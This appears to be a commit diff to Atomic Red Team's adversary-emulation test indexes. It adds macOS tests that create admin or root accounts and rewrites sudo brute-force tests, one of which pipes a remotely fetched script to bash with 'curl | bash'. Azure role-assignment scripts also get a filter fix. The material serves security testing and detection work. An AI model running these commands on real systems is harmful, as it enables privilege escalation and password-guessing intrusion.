 exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -665,8 +665,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -986,8 +989,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1497,8 +1503,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1667,9 +1676,9 @@
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
   - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -2100,7 +2109,8 @@
   - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
-  - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
+  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
+  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
@@ -2460,8 +2470,11 @@
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -392,8 +392,8 @@
   - Atomic Test #5: SSHD PAM keylogger [linux]
   - Atomic Test #6: Auditd keylogger [linux]
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
-  - Atomic Test #4: SUDO brute force Debian [linux]
-  - Atomic Test #5: SUDO brute force Redhat [linux]
+  - Atomic Test #5: SUDO Brute Force - Debian [linux]
+  - Atomic Test #6: SUDO Brute Force - Redhat [linux]
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -157,6 +157,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # collection
@@ -303,6 +306,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # privilege-escalation
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -377,6 +383,9 @@
 - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # credential-access
 - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -662,6 +671,9 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #2: Create local account with admin privileges - MacOS [macos]
+  - Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
+  - Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
+  - Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -492,8 +492,8 @@
 - T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -721,8 +721,8 @@
   - Atomic Test #1: Netsh Helper DLL Registration [windows]
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1075,8 +1075,8 @@
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1195,7 +1195,7 @@
 - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
   - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
   - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
-  - Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
+  - Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
   - Atomic Test #1: Gsecdump [windows]
   - Atomic Test #2: Credential Dumping with NPPSpy [windows]
@@ -1513,7 +1513,8 @@
   - Atomic Test #2: Discover System Language with chcp [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
-  - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
+  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
+  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
@@ -1742,8 +1743,8 @@
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]
-  - Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
-  - Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
+  - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
+  - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/azure-ad-index.yaml

@@ -36712,7 +36712,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36737,7 +36738,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -36749,7 +36750,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }

atomics/Indexes/iaas_azure-index.yaml

@@ -36444,7 +36444,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -36473,7 +36474,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -36488,7 +36489,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }

atomics/Indexes/index.yaml

@@ -27192,6 +27192,45 @@ defense-evasion:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -42619,6 +42658,45 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -61061,7 +61139,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -61086,7 +61165,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -61098,7 +61177,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
           if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -61200,7 +61279,8 @@ persistence:
           type: string
           default: p4sswd
         user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
           type: string
           default: SuperUser
         role_name:
@@ -61229,7 +61309,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -61244,7 +61324,7 @@ persistence:
           $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
           Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
           if ($user -eq $null) { Write-Warning "User not found"; exit }
           $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
           if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -67134,6 +67214,45 @@ persistence:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
     - name: WinPwn - Loot local Credentials - powerhell kittie
       auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
       description: Loot local Credentials - powerhell kittie technique via function
@@ -74841,81 +74960,6 @@ credential-access:
             }
           }
           Write-Host "End of bruteforce"
-    - name: SUDO brute force Debian
-      auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: |
-        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Debian based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y sudo
-
-          '
-      executor:
-        elevation_required: false
-        command: |
-          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-          echo done
-        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
-
-          '
-        name: sh
-    - name: SUDO brute force Redhat
-      auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Redhat based Linux distribution.  \n"
-      supported_platforms:
-      - linux
-      dependency_executor_name: sh
-      dependencies:
-      - description: 'Check if running on a Redhat based machine.
-
-          '
-        prereq_command: |
-          if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-          if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-          if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'yum -y update && yum install -y openssl sudo
-
-          '
-      executor:
-        elevation_required: true
-        command: |
-          useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
-
-          '
-        name: sh
     - name: Password Brute User using Kerbrute Tool
       auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
       description: 'Bruteforce a single user''s password from a wordlist
@@ -74961,6 +75005,92 @@ credential-access:
         elevation_required: false
         command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
           -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
+    - name: SUDO Brute Force - Debian
+      auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
+          description: url of remote payload
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Check if running on a Debian based machine.
+
+          '
+        prereq_command: |
+          if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+          if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+          if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+          if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+          if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+        get_prereq_command: 'apt update && apt install -y openssl sudo curl
+
+          '
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+          su art
+          cd /tmp
+          curl -s #{remote_url} |bash
+        cleanup_command: 'userdel -fr art
+
+          '
+    - name: SUDO Brute Force - Redhat
+      auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
+      description: "An adversary may find themselves on a box (e.g. via ssh key auth,
+        with no password) with a user that has sudo'ers privileges, but they do not
+        know the users password. Normally, failed attempts to access root will not
+        cause the root account to become locked, to prevent denial-of-service. This
+        functionality enables an attacker to undertake a local brute force password
+        guessing attack without locking out the root user. \n\nThis test creates the
+        \"art\" user with a password of \"password123\", logs in, downloads and executes
+        the sudo_bruteforce.sh which brute force guesses the password, then deletes
+        the user\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        remote_url:
